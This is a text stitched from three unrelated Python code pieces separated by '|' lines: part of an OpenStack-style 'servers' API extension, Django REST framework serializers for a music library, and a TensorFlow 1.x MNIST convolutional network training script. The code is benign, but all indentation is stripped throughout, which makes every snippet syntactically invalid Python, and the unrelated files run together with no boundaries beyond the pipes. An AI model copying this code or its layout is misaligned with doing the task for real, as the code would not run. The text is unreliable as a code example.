alias = "servers"
version = 1
def get_resources(self):
member_actions = {'action': 'POST'}
collection_actions = {'detail': 'GET'}
resources = [
extensions.ResourceExtension(
'servers',
ServersController(extension_info=self.extension_info),
member_name='server', collection_actions=collection_actions,
member_actions=member_actions)]
return resources
def get_controller_extensions(self):
return []
|
from rest_framework.reverse import reverse
from rest_framework import serializers
from .models import Artist, Album, Song
class ArtistSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Artist
fields = ('id', 'name', 'albums', 'songs', )
class AlbumSerializer(serializers.ModelSerializer):
class Meta:
model = Album
fields = ('id', 'artist', 'title', 'songs', )
class SongSerializer(serializers.ModelSerializer):
artist = ArtistSerializer()
album = AlbumSerializer()
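    # SerializerMethodField calls get_song_url below; reverse() builds an
    # absolute URL for the 'song_file' route, provided the view places the
    # request in the serializer context (DRF generic views do).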
song_url = serializers.SerializerMethodField()
def get_song_url(self, obj):
return reverse('song_file', args=[obj.id], request=self.context.get('request', None))
class Meta:
model = Song
fields = ('id', 'fingerprint', 'artist', 'album', 'title', 'length', 'song_url', 'content_type', )
class LibrarySerializer(serializers.ModelSerializer):
artist = ArtistSerializer()
album = AlbumSerializer()
    song_url = serializers.SerializerMethodField()
def get_song_url(self, obj):
return reverse('song_file', args=[obj.id], request=self.context.get('request', None))
class Meta:
model = Song
fields = ('id', 'fingerprint', 'artist_id', 'artist', 'album_id', 'album', 'title', 'length', 'song_url',
'content_type', )
|
import numpy as np
import tensorflow as tf
import time
batch_size = 128
decay = 0.99
epochs = 20
learning_rate = 0.5
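# is_training toggles batch normalization between per-batch statistics
# (training) and the accumulated moving averages (evaluation).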
is_training = tf.placeholder(tf.bool)
# input image dimensions
img_rows, img_cols = 28, 28
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
x_train = x_train.reshape([x_train.shape[0], img_rows, img_cols, 1])
x_train = x_train.astype('float32') / 255
y_train = tf.keras.utils.to_categorical(y_train, num_classes=10)
x_test = x_test.reshape([x_test.shape[0], img_rows, img_cols, 1])
x_test = x_test.astype('float32') / 255
y_test = tf.keras.utils.to_categorical(y_test, num_classes=10)
# input place holders
X = tf.placeholder(tf.float32, [None, img_rows, img_cols, 1])
Y = tf.placeholder(tf.float32, [None, 10])
# weights & bias for neural networks
W1 = tf.get_variable(name="W1", shape=[5, 5, 1, 24], initializer=tf.keras.initializers.he_normal())
L1 = tf.nn.conv2d(X, W1, strides=[1, 1, 1, 1], padding='VALID')
L1 = tf.contrib.layers.batch_norm(L1, center=True, decay=decay, scale=True, is_training=is_training)
L1 = tf.nn.relu(L1)
P1 = tf.nn.max_pool(L1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
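# Note: the "/ 2" below scales the tensor fed into the conv; the underlying
# trainable variables keep their He-normal initialization.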
W2_depthwise = tf.get_variable(name="W2_depthwise", shape=[5, 5, 24, 1], initializer=tf.keras.initializers.he_normal()) / 2
W2_pointwise = tf.get_variable(name="W2_pointwise", shape=[1, 1, 24, 48], initializer=tf.keras.initializers.he_normal()) / 2
L2 = tf.nn.separable_conv2d(P1, W2_depthwise, W2_pointwise, strides=[1, 1, 1, 1], padding='VALID')
L2 = tf.contrib.layers.batch_norm(L2, center=True, decay=decay, scale=True, is_training=is_training)
L2 = tf.nn.relu(L2)
P2 = tf.nn.max_pool(L2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
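# Spatial sizes: 28 -> 24 (5x5 VALID conv) -> 12 (2x2 pool) -> 8 (5x5 VALID
# conv) -> 4 (2x2 pool), so the flattened feature vector has 4 * 4 * 48 values.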
P2_flat = tf.reshape(P2, [-1, 4 * 4 * 48])
W3 = tf.get_variable(name="W3", shape=[4 * 4 * 48, 512], initializer=tf.keras.initializers.he_normal()) / 2
b3 = tf.get_variable(name="b3", shape=[512], initializer=tf.zeros_initializer())
L3 = tf.matmul(P2_flat, W3) + b3
L3 = tf.contrib.layers.batch_norm(L3, center=True, decay=decay, scale=True, is_training=is_training)
L3 = tf.nn.relu(L3)
W4 = tf.get_variable(name="W4", shape=[512, 10], initializer=tf.keras.initializers.he_normal())
b4 = tf.get_variable(name="b4", shape=[10], initializer=tf.zeros_initializer())
hypothesis = tf.matmul(L3, W4) + b4
# define cost & optimizer
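# hypothesis holds raw logits: softmax_cross_entropy_with_logits_v2 applies the
# softmax internally, and tf.argmax for accuracy works on logits directly.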
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=hypothesis, labels=Y))
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
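# tf.contrib.layers.batch_norm registers its moving-average updates in
# tf.GraphKeys.UPDATE_OPS; the control_dependencies block ensures they run
# on every training step.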
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train = optimizer.minimize(cost)
accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1)), tf.float32))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
start_time = time.time()
iterations = 0
for step in range(epochs):
# shuffle data
p = np.random.permutation(len(x_train))
x_train = x_train[p]
y_train = y_train[p]
score = [0, 0]
loss = [0, 0]
for i in range(0, x_train.shape[0], batch_size):
size = batch_size if i + batch_size <= x_train.shape[0] else x_train.shape[0] - i
c, a, _ = sess.run([cost, accuracy, train], feed_dict={X: x_train[i:i+size], Y: y_train[i:i+size], is_training: True})
loss[0] += c * size
score[0] += a * size
iterations += 1
for i in range(0, x_test.shape[0], batch_size):
size = batch_size if i + batch_size <= x_test.shape[0] else x_test.shape[0] - i
c, a = sess.run([cost, accuracy], feed_dict={X: x_test[i:i+size], Y: y_test[i:i+size], is_training: False})
loss[1] += c * size
score[1] += a * size
print('loss: {:.4f} / {:.4f}\taccuracy: {:.4f} / {:.4f}\tstep {} {:.2f} sec'.format(loss[0] / x_train.shape[0], loss[1] / x_test.shape[0], score[0] / x_train.shape[0], score[1] / x_test.shape[0], step + 1, time.time() - start_time))
|